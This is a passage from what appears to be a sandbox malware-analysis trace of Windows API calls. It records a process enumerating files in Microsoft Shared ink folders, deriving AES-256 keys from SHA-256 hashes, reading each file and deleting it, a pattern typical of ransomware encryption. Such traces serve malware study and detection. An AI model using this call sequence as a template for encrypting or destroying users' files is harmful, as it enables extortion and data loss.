hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mshwLatin.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mshwLatin.dll.mui", lpUsedDefaultChar=0x0) returned 18 [0137.847] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="rtscom.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rtscom.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0137.847] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShapeCollector.exe.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShapeCollector.exe.mui", lpUsedDefaultChar=0x0) returned 23 [0137.847] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="split.avi", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="split.avi", lpUsedDefaultChar=0x0) returned 10 [0137.883] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0137.884] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0137.884] CryptHashData (hHash=0x284d628, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0137.884] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0137.884] GetFileSize (in: hFile=0x414, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2f600 [0137.884] ReadFile (in: hFile=0x414, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0137.894] CryptDestroyHash (hHash=0x284d628) returned 1 [0137.894] CryptDestroyKey (hKey=0x284d568) returned 1 [0137.894] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0137.895] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi")) returned 0 [0137.895] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tabskb.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tabskb.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0137.895] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TipBand.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TipBand.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0137.896] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TipRes.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TipRes.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0137.896] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0137.896] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TipTsf.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TipTsf.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0137.896] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0137.896] FindClose (in: hFindFile=0x284d5e8 | out: hFindFile=0x284d5e8) returned 1 [0137.896] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.896] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0137.896] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.896] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0137.896] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0137.896] FindClose (in: hFindFile=0x284d5e8 | out: hFindFile=0x284d5e8) returned 1 [0137.896] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.897] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0137.897] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.897] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0137.897] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0137.897] FindClose (in: hFindFile=0x284d5e8 | out: hFindFile=0x284d5e8) returned 1 [0137.897] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.898] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0137.898] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.898] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0137.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0137.898] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0137.898] FindClose (in: hFindFile=0x284d5e8 | out: hFindFile=0x284d5e8) returned 1 [0137.898] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0137.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FlickAnimation.avi", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlickAnimation.avi", lpUsedDefaultChar=0x0) returned 19 [0137.898] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0137.899] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0137.899] CryptHashData (hHash=0x284d5e8, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0137.899] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0137.899] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x186b84 [0137.899] ReadFile (in: hFile=0x40c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0138.006] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0138.006] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0138.006] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.007] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi")) returned 0 [0138.007] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FlickLearningWizard.exe", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlickLearningWizard.exe", lpUsedDefaultChar=0x0) returned 24 [0138.007] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.008] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0138.008] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0138.008] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0138.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0138.008] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0138.008] FindClose (in: hFindFile=0x284d568 | out: hFindFile=0x284d568) returned 1 [0138.008] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.192] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0138.192] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0138.192] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0138.197] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0138.197] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.197] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="auxbase.xml", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="auxbase.xml", lpUsedDefaultChar=0x0) returned 12 [0138.236] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0138.237] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0138.237] CryptHashData (hHash=0x284d5e8, pbData=0x2836500, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.237] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0138.237] GetFileSize (in: hFile=0x414, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x59a [0138.237] ReadFile (in: hFile=0x414, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0138.250] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0138.250] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.250] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.252] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml")) returned 0 [0138.252] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 0 [0138.252] FindClose (in: hFindFile=0x284d5a8 | out: hFindFile=0x284d5a8) returned 1 [0138.252] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0138.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="auxpad.xml", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="auxpad.xml", lpUsedDefaultChar=0x0) returned 11 [0138.260] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0138.261] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0138.261] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.261] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0138.261] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd4 [0138.261] ReadFile (in: hFile=0x40c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0138.262] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0138.262] CryptDestroyKey (hKey=0x284d668) returned 1 [0138.262] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.263] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml")) returned 0 [0138.263] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0138.264] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0138.264] FindNextFileW (in: hFindFile=0x284d628, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.264] FindNextFileW (in: hFindFile=0x284d628, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ea.xml", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ea.xml", lpUsedDefaultChar=0x0) returned 7 [0138.264] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0138.265] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0138.265] CryptHashData (hHash=0x284d668, pbData=0x2836500, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.265] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0138.265] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x180 [0138.265] ReadFile (in: hFile=0x40c, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0138.266] CryptDestroyHash (hHash=0x284d668) returned 1 [0138.266] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0138.266] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.267] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml")) returned 0 [0138.267] FindNextFileW (in: hFindFile=0x284d628, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="keypadbase.xml", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="keypadbase.xml", lpUsedDefaultChar=0x0) returned 15 [0138.270] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0138.271] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0138.271] CryptHashData (hHash=0x284d5e8, pbData=0x2836500, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.271] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0138.271] GetFileSize (in: hFile=0x414, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x45e [0138.271] ReadFile (in: hFile=0x414, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0138.283] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0138.283] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0138.283] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.285] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml")) returned 0 [0138.285] FindNextFileW (in: hFindFile=0x284d628, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kor-kor.xml", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kor-kor.xml", lpUsedDefaultChar=0x0) returned 12 [0138.285] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0138.286] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0138.286] CryptHashData (hHash=0x284d668, pbData=0x2836500, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.286] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0138.286] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x188 [0138.286] ReadFile (in: hFile=0x40c, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0138.288] CryptDestroyHash (hHash=0x284d668) returned 1 [0138.288] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0138.288] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.290] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml")) returned 0 [0138.290] FindNextFileW (in: hFindFile=0x284d628, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 0 [0138.290] FindClose (in: hFindFile=0x284d628 | out: hFindFile=0x284d628) returned 1 [0138.290] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0138.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="keypad.xml", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="keypad.xml", lpUsedDefaultChar=0x0) returned 11 [0138.295] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0138.296] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0138.296] CryptHashData (hHash=0x284d628, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.296] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0138.296] GetFileSize (in: hFile=0x418, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2d7 [0138.296] ReadFile (in: hFile=0x418, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0138.312] CryptDestroyHash (hHash=0x284d628) returned 1 [0138.312] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0138.312] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.313] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml")) returned 0 [0138.314] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0138.315] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0138.315] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.315] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="base.xml", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="base.xml", lpUsedDefaultChar=0x0) returned 9 [0138.317] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0138.317] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0138.317] CryptHashData (hHash=0x284d5e8, pbData=0x2836500, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.317] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0138.317] GetFileSize (in: hFile=0x418, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc4e [0138.317] ReadFile (in: hFile=0x418, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0138.320] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0138.320] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.320] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.321] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml")) returned 0 [0138.321] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="baseAltGr_rtl.xml", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="baseAltGr_rtl.xml", lpUsedDefaultChar=0x0) returned 18 [0138.322] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0138.322] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0138.322] CryptHashData (hHash=0x284d668, pbData=0x2836500, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.322] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, 